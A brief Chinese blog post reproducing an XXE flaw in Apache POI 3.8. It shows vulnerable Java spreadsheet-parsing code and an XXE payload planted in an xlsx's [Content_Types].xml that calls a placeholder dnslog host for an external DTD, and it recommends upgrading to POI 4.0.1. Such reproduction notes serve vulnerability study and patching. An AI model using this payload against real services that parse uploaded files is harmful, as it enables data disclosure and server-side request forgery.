org.apache.poi 3.8 excel xxe漏洞复现

复现步骤

pom.xml引入依赖

<dependency>
    <groupId>org.apache.poi</groupId>
    <artifactId>poi</artifactId>
    <version>3.8</version>
</dependency>
<dependency>
    <groupId>org.apache.poi</groupId>
    <artifactId>poi-ooxml</artifactId>
    <version>3.8</version>
</dependency>

关键代码:

public String readExcelData(String path,String sheetName) throws IOException {
        FileInputStream fileInputStream = null;
        fileInputStream = new FileInputStream(path);
        XSSFWorkbook sheets = new XSSFWorkbook(fileInputStream);
        //获取sheet
        sheet = sheets.getSheet(sheetName);
        //获取行数
        int rows = sheet.getPhysicalNumberOfRows();
        StringBuilder cell= new StringBuilder();
        for (int i = 0; i < rows; i++) {
            //获取列数
            XSSFRow row = sheet.getRow(i);
            int columns = row.getPhysicalNumberOfCells();
            for (int j = 0; j < columns; j++) {
                cell.append(row.getCell(j).toString()).append("</br>");
            }
        }
        return cell.toString();
    }

  

xxe.xlsx解压后,修改[Content_Types].xml,在第二行加入

<!DOCTYPE x [ <!ENTITY xxe SYSTEM "http://dnslog/test.dtd"> ]>
<x>&xxe;</x>

  

访问后即可触发dnslog

 

解决方案:

升级poi到4.0.1以上版本

posted @ 2022-02-28 18:42  妇愁者纞萌  阅读(618)  评论(0编辑  收藏  举报